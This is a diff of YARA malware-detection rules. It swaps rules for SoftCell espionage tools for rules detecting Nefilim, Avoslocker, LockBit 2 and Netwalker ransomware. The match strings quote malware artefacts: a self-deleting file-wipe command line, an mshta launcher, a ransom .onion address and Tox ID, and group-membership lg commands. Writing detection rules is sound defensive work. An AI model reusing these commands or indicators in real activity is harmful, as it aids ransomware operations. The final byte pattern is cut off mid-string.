-		logic_hash = "b48e91afa19e09c7035ccda1b9293448e834d612b9a953b593f9412acb78faac"
+		hash = "353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5"
+		logic_hash = "7625eb7de1ebb2f5410552b8983379f213d639f5e146a5d951975b69eb8111d3"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "Trojan"
-
-	strings:
-		$0 = {E4B5518CD941310A015E4AF8E5968C8231492FE19246A293A569D5D7A36F56EB2FC5B68FFF6F3359C19AF6806920C3FE6628F90A75440E6616297A031BA6075100D72DFAA9829E772E45D77B89F862081EAFDB19B4B2DCEF3F273FF645ACCEAA4B991F98373973C0FB25829E860D9BC195EF1A0AD9219456AD077D42868EE03EE00E88D04C434BA97E88DF99273A35E2C668A1C69954B4762390ABDFBE4CD4AF}
-		$1 = {90506F1C825F7AE0D8605F5C627CA325BFF199AB60A63DE8A90E923F4B18D7FB039E1DEC89D573AAB0A14C1D4BA70EB444753A41C03082A60CB4DB551393F2C50988A3181E7F31D01B5AAD94070432D98F18655AB8A555919FEFEA9DE1EDF1}
-		$2 = {D5EEF61336015A85FF04ED298A6BDD6742FF153E33DAF9B383A5FFDCE7E64D47748DB5FF2609DF9BD5C66735FF6916797B2D365313FF1461EAEB9DAEA754FF6D4D55D1956CC8CBFF75C10CE74BF88C8DFF3B553B839D42609FFF2916227230}
-		$3 = {6C750DDC932124500CE9B5AB91CE101BE9AD348220E9423124512282373675152281023428825C51770FE9841F853375125382F732750A5B83F60FEB6AEE2282647462228269745AEE22826F7452228275744AEE2282787442}
-		$4 = {19A8A063FFAAAF6C1E7F78A896FFFA5C8F30BA98B69CFF1961E107BEB7636AFF9EA56A4FC4EDE3F1FF295235ACD0185726FFADA6B8CB54B342C9FF86F58524DC91617BFFB4388DBE01B6CF86}
-		$5 = {50C449606B20184A6328556032197660AAF9507861609F6160640560B4546160C3A194056070C4A09EC4A01A0461A4C4A0831B16600561916069A291607061C09160AA1CB6204A}
-		$6 = {FFEB19D2636B8B95273156BB63E8C78470D55970F47CF26574B46DE86EE084704590CA8053F15320258BBD1AACF18B04F2E965C6605CB10880B7E8FCF53DF5EB0621635EFF}
-		$7 = {7E31126E14B8FF98554F6FCFB64207FFCF8D93B2573609C2FF99E4409F73BB9322FF1E5E380DC0BBABCAFF4B901EDF61BD6A68FFEE3253728C7769ABFF7BCDA939C959A282}
-		$8 = {1970FFC6F8AA7C32EE693CFF369579E5355EF62CFF682CEAF20BA3EA1CFF1AAC638666431B20FF54293D1E709C231AFFCD11B55599F64CB9FF1E5A9015DC867F}
-		$9 = {8DFF93B2573609C299E4FF409F73BB93221E5EFF380DC0BBABCA4B90FF1EDF61BD6A68EE32FF53728C7769AB7BCDFFA939C959A282D312FF5DD04F0370CE811F}
-		$10 = {DF5519064E31101CF3DA96C15FF96728B708F358F51759E3A22FFA1CF1BB986A2038D6753E6BF037945B8469ADF20BAB71E10F3DE27735F640704C970DFE8672}
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nefilim"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH/CN=Red GmbH" and pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . thumbprint == "5b:19:58:8b:78:74:0a:4c:5d:08:41:99:dc:0f:52:a6:1f:38:00:99" )
 }
-
-rule TRELLIX_ARC_Shadowspawn_Utility : UTILITY FILE
+rule TRELLIX_ARC_RANSOM_Nefilim_Go : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect ShadowSpawn utility used in the SoftCell operation"
+		description = "Rule to detect the new Nefilim written in GO"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "0a325f5c-2750-5354-b920-f7e1510a8b71"
-		date = "2019-06-25"
+		id = "a8809060-c646-5d54-88e7-c8054305ee6c"
+		date = "2020-07-13"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L3-L32"
+		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L74-L98"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0f2805aee60cdb4eb932768849c845052c92131d0b25a511b822b79b2ac93e24"
+		hash = "a51fec27e478a1908fc58c96eb14f3719608ed925f1b44eb67bbcc67bd4c4099"
+		logic_hash = "f0b10286fb1623a32bcf1f30cadce2901f7711cb36db6bbe812f6c2e03862270"
 		score = 75
 		quality = 70
-		tags = "UTILITY, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "utility"
-		malware_family = "Trojan:W32/ShadowSpawn"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nefilim"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "C:\\data\\projects\\shadowspawn\\src\\bin\\Release-W2K3\\x64\\ShadowSpawn.pdb" fullword ascii
-		$op0 = { e9 34 ea ff ff cc cc cc cc 48 8d 8a 20 }
-		$op1 = { 48 8b 85 e0 06 00 00 48 8d 34 00 48 8d 46 02 48 }
-		$op2 = { e9 34 c1 ff ff cc cc cc cc 48 8b 8a 68 }
+		$pattern = { FF20476F206275696C642049443A20226A744368374D37436A4A5732634C5F636633374A2F49625946794336635A64735F4D796A56633461642F486B6D36694A4D39327847785F4F2D65746744692F664E37434C43622D59716E374D795947565A686F220A20FFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108766B83EC0CC744241400000000C7442418000000008B4424108400890424E88D0200008B44240485C0740789C183F8FF7514C744241400000000C74424180000000083C40CC3894C24088B44241083C004890424E8570200008B4424048B4C2408894C24148944241883C40CC3E8AE5A0400E979FFFFFFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EC00000083EC108B44241885C00F84C30000008B4424148400890424E8FD0100008B44240485C0742E89C183F8FF74E38B44241839C10F85800000008B44241C894424048B44241483C004890424E88B12000083C410C3E8620303008B442414890424C744240400000000C7442408FFFFFFFFE8A61200000FB644240C84C07507E868030300EB8B8B44241C894424048B4424148D4804890C24E83F1200008B442418894424048B442414890424E82B120000E83603030083C410C38D05408E4E008904248D05B8CC510089442404E8DA3F02000F0B8D05408E4E008904248D05B0CC510089442404E8C03F02000F0BE899590400E9F4FEFFFFCCCCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B4424088B4C240CF00FB14D000F94442410C3CCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B44240889C1F00FC1450001C1894C240CC3CCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B7424088B7C240C8B45008B550489C389D101F311F9F00FC74D0075F1895C2410894C2414C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B442404A90700000074068B05000000000F6F000F7F4424080F77C3CCCCCCCCE9CBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9BBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C24048B442408874500C3CCCCCCCCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B4424040FBCC074058944240CC38B4424080FBCC0740883C0208944240CC3C744240C40000000C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC83EC208B4424248B088B54242889CB01D1894C241C8B6804890424895C2404896C2408894C240C8B5C242C11DD896C2418896C2410E8160100000FB644241484C074C08B44241C894424308B4424188944243483C420C3CCCCCCCCCCCCCCCCCC83EC208B4424248B08894C24188B50048954241C890424894C2404895424088B5C2428895C240C8B6C242C896C2410E8BC0000000FB644241484C074C68B442418894424308B44241C8944243483C420C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9EBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DB000000CCCCCCCCCCCCCCCCCCCCCCE97B000000CCCCCCCCCCCCCCCCCCCCCCE9CB000000CCCCCCCCCCCCCCCCCCCCCCE9BBFEFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B2D000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCC8B5C24048B44240889C1F00FC10301C88944240CC3CCCCCCCCCCCCCCCCCCCCCC8B5C24048B44240887038944240CC3CCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B442404A90700000074068B05000000008D5C24080F6F000F7F030F77C3CCCC8B442404A90700000074068B05000000000F6F4424080F7F000F77B800000000F00FC10424C3CCCCCCCCCCCCCCCCCCCC8B4424048A5C2408F00818C3CCCCCCCC8B4424048A5C2408F02018C3CCCCCCCC648B0D140000008B89000000003B610876098B4424088944240CC3E860550400EBDECCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240801000000E8AF4400008B44240C8944241C83C410C3E80E550400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240802000000E85F4400008B44240C8944241C83C410C3E8BE540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240810000000E80F4400008B44240C8944241C83C410C3E86E540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC83EC108D42048B008B4C2414890C248B4C2418894C240489442408E8D04300008B44240C8944241C83C410C3CCCCCCCC648B0D140000008B89000000003B6108762C83EC108B4424148B088B400489442408890C248B44241889442404E88E4300008B44240C8944241C83C410C3E8ED530400EBBBCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B600000083EC108B442414F30F10000F57C90F2EC175060F8B860000000F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240804000000E8C74200008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E80F530400E92AFFFFFFCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B800000083EC108B442414F20F10000F57C9660F2EC175060F8B87000000660F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240808000000E8E54100008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E82D520400E928FFFFFFCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E815FEFFFF8B44241083C0048B4C2408890424894C2404E8FEFDFFFF8B4424088944241883C40CC3E8CD510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E895FEFFFF8B44241083C0088B4C2408890424894C2404E87EFEFFFF8B4424088944241883C40CC3E86D510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86F200000083EC248B4424288B0885C974678B49048B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E8B2FA03008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8F46603008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E81E8E00008B44240C8B4C2408890C2489442404E87A3602000F0BE853500400E9EEFEFFFFCCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EF00000083EC248B4424288B0885C974648B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E895F903008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8D76503008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E8018D00008B44240C8B4C2408890C2489442404E85D3502000F0BE8364F0400E9F1FEFFFFCC648B0D140000008B89000000003B61087606C644240C01C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "eaae87b11d2ebdd286af419682037b4c" and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them
 }
 
-rule TRELLIX_ARC_Poison_Ivy_Softcell : RAT FILE
+rule TRELLIX_ARC_Ransom_Avoslocker : FILE
 {
 	meta:
-		description = "Rule to detect Poison Ivy used in the SoftCell operation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c362b116-4cb6-5393-9c64-28e8d2886dc7"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L34-L72"
+		description = "Rule to detect Avoslocker Ransomware"
+		author = "CB @ ATR"
+		id = "50f029c8-154e-583d-8264-8d86d01075f6"
+		date = "2021-07-22"
+		modified = "2021-07-22"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Avoslocker.yar#L3-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "ac84023404d76adf8cfd8d26bb59fb51f29057748806c4f5ea0634803fd937cd"
+		logic_hash = "316aaab225797eedd62f9cfde1fdbd799a10441b3b15a8abc76141b57b36b1d3"
 		score = 75
 		quality = 70
-		tags = "RAT, FILE"
-		rule_version = "v1"
-		malware_type = "rat"
-		malware_family = "Rat:W32/PoisonIvy"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		tags = "FILE"
+		Version = "v1"
+		DetectionName = "Ransom_Win_Avoslocker"
+		hash1 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
+		hash2 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
 
 	strings:
-		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
-		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
-		$s3 = "&Enter password for the encrypted file:" fullword wide
-		$s4 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
-		$s5 = "setup.bat" fullword ascii
-		$s6 = "ErroraErrors encountered while performing the operation" fullword wide
-		$s7 = "Please download a fresh copy and retry the installation" fullword wide
-		$s8 = "antivir.dat" fullword ascii
-		$s9 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
-		$s10 = "=Total path and file name length must not exceed %d characters" fullword wide
-		$s11 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
-		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
-		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
-		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
+		$v1 = "CryptImportPublicKeyInfo failed. error: %d" fullword ascii
+		$v2 = "CryptStringToBinary failed. Err: %d" fullword ascii
+		$v3 = "encrypting %ls failed" fullword wide
+		$v4 = "CryptDecodeObjectEx 1 failed. Err: %p" fullword ascii
+		$v5 = "operator co_await" fullword ascii
+		$v6 = "drive %s took %f seconds" fullword ascii
+		$seq0 = { 8d 4e 04 5e e9 b1 ff ff ff 55 8b ec ff 75 08 ff }
+		$seq1 = { 33 c0 80 fb 2d 0f 94 c0 05 ff ff ff 7f eb 02 f7 }
+		$seq2 = { 8b 40 0c 89 85 1c ff ff ff 8b 40 0c 89 85 18 ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "a24c2b5bf84a5465eb75f1e6aa8c1eec" and ( 5 of them ) and all of ( $seq* ) ) or ( all of them )
 }
-
-rule TRELLIX_ARC_Trochilus_Softcell : TROJAN FILE
+rule TRELLIX_ARC_Lockbit2_Jul21 : FILE
 {
 	meta:
-		description = "Rule to detect Trochilus malware used in the SoftCell operation"
-		author = "Trellix ARC Team"
-		id = "81e942ae-936f-5952-8d50-ee8cec74520b"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L74-L106"
+		description = "simple rule to detect latest Lockbit ransomware Jul 2021"
+		author = "CB @ ATR"
+		id = "22b423df-ae5c-5672-95be-333b13791fc6"
+		date = "2021-07-28"
+		modified = "2021-07-28"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Lockbit2.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "80a0841a08627acf11707f3aeef4e7c3777aecf04b932755efa618d7e92b0cda"
-		score = 75
+		logic_hash = "b3ed7d7c72b7585877293f586bae5ec7b0135b09d518b4e4b08f64e60db5a159"
+		score = 50
 		quality = 70
-		tags = "TROJAN, FILE"
-		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Trochilus"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		tags = "FILE"
+		version = "v1"
+		hash1 = "f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202"
+		hash2 = "dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d"
 
 	strings:
-		$s1 = "Shell.dll" fullword ascii
-		$s2 = "photo.dat" fullword wide
-		$s3 = "VW9HxtV9H|tQ9" fullword ascii
-		$s4 = "G6uEGRich7uEG" fullword ascii
-		$op0 = { e8 9d ad ff ff ff b6 a8 }
-		$op1 = { e8 d4 ad ff ff ff b6 94 }
-		$op2 = { e8 ea ad ff ff ff b6 8c }
+		$seq1 = " /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" fullword wide
+		$seq2 = "\"C:\\Windows\\system32\\mshta.exe\" \"%s\"" fullword wide
+		$p1 = "C:\\windows\\system32\\%X%X%X.ico" fullword wide
+		$p2 = "\\??\\C:\\windows\\system32\\%X%X%X.ico" fullword wide
+		$p3 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell\\Open\\Command" fullword wide
+		$p4 = "use ToxID: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" fullword wide
+		$p5 = "https://tox.chat/download.html" fullword wide
+		$p6 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" fullword wide
+		$p7 = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" fullword wide
+		$p8 = "\\LockBit_Ransomware.hta" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8e13ebc144667958722686cb04ee16f8" and ( pe.exports ( "Entry" ) and pe.exports ( "Main" ) ) and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $seq* ) and 4 of them ) ) or ( all of them )
 }
-
-rule TRELLIX_ARC_Lg_Utility_Lateral_Movement_Softcell : UTILITY FILE
+rule TRELLIX_ARC_Netwalker_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the utility LG from Joeware to do Lateral Movement in the SoftCell operation"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "4f435348-427a-5f35-9545-5582033eb043"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L108-L143"
+		description = "Rule to detect Netwalker ransomware"
+		author = "McAfee ATR Team"
+		id = "6fe75a64-77b8-5cb8-9365-a5336d4d1617"
+		date = "2020-03-30"
+		modified = "2020-11-20"
+		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L3-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f88781b9632cd31bb9e3d68730c63c3fcd0ebe4a09b70b5b54d456cdc9ae8d01"
+		logic_hash = "11da4b57f8d9ed1fdf053053a51870af2cbf4062cc1340087ee70c3e92a1baf6"
 		score = 75
 		quality = 70
-		tags = "UTILITY, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "utility"
-		malware_family = "Utility:W32/Joeware"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_type = "ransomware"
+		note = "The rule doesn't detect the samples packed with UPX"
 
 	strings:
-		$s1 = "lg \\\\comp1\\users louise -add -r comp3" fullword ascii
-		$s2 = "lg \\\\comp1\\users S-1-5-567-678-89765-456 -sid -add" fullword ascii
-		$s3 = "lg \\\\comp1\\users -sidsout" fullword ascii
-		$s4 = "Enumerates members of localgroup users on localhost" fullword ascii
-		$s5 = "Adds SID resolved at comp3 for louise to localgroup users on comp1" fullword ascii
-		$s6 = "CodeGear C++ - Copyright 2008 Embarcadero Technologies" fullword ascii
-		$s7 = "Lists members of localgroup users on comp1 in SID format" fullword ascii
-		$s8 = "ERROR: Verify that CSV lines are available in PIPE input. " fullword ascii
-		$op0 = { 89 43 24 c6 85 6f ff ff ff 00 83 7b 24 10 72 05 }
-		$op1 = { 68 f8 0e 43 00 e8 8d ff ff ff 83 c4 20 68 f8 0e }
-		$op2 = { 66 c7 85 74 ff ff ff 0c 00 8d 55 d8 52 e8 e9 eb }
+		$pattern = { 8B????8B????89??C7????????????EB??8B????52E8????????83????8B????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCC558B??83????C7????????????83??????74??83??????72??83??????75??8B????E9????????C7????????????8B????33??B9????????F7??83????89????8B????8B????8D????51E8????????83????89????83??????0F84????????C7????????????C7????????????C6??????C6??????C6??????8B????3B????0F84????????8B????2B????39????73??8B????89????EB??8B????2B????89????8B????89????C7????????????8B????03????8B????2B??89????74??83??????7E??83??????7D??C7????????????8B????03????89????8B????518B????03????528B????03????50E8????????83????8B????03????89????83??????75??6A??8D????528B????03????50E8????????83????8B????83????89????8B????03????89????E9????????8B????8B????89??83??????74??8B????52E8????????83????8B????89??C7????????????8B????8B??5DC3CCCCCCCC558B??51B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????81????????????75??8B????83????89????C7????????????EB??C7????????????B9????????6B????8B????0FB6????BA????????C1????8B????0FB6????C1????0B??B8????????D1??8B????0FB6????C1????0B??BA????????6B????8B????0FB6????C1????0B??BA????????C1????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FBE????BA????????C1????8B????0FBE????C1????0B??B8????????D1??8B????0FBE????C1????0B??BA????????6B????8B????0FBE????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????D1??8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????6B????8B????89????8B??5DC3CCCCCC558B??B8????????6B????8B????C7????????????B8????????6B????8B????C7????????????B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????5DC3CCCCCC558B??83????83??????75??E9????????8B????508D????51E8????????83????BA????????6B????8B????8B????83????B8????????6B????8B????89????B9????????6B????8B????83??????75??B9????????6B????8B????8B????83????BA????????6B????8B????89????83??????77??C7????????????EB??8B????83????89????8B????3B????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??EB??C7????????????EB??8B????83????89????83??????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??8B????83????89????8B????83????89????8B????83????89????E9????????8B??5DC3CCCCCCCCCCCCCCCC558B??83????C7????????????EB??8B????83????89????83??????7D??8B????8B????8B????8B????89??????EB??C7????????????EB??8B????83????89????83??????0F8E????????B9????????6B????B8????????C1????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????C1????BA????????C1????8B??????33??????C1????B9????????C1????BA????????C1????8B??????33??????C1????0B??BA????????C1????89??????B8????????6B????BA????????C1????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????C1????BA????????6B????8B??????03??????BA????????C1????89??????B8????????C1????B9????????C1????8B??????33??????C1????B8????????C1????B9????????C1????8B??????33??????C1????0B??B9????????C1????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????6B????B8????????C1????8B??????33??????C1????BA????????6B????BA????????C1????8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????C1????B9????????6B????8B??????03??????B9????????C1????89??????BA????????6B????B9????????C1????8B??????33??????C1????B8????????6B????B8????????C1????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B????B9????????6B????8B??????03?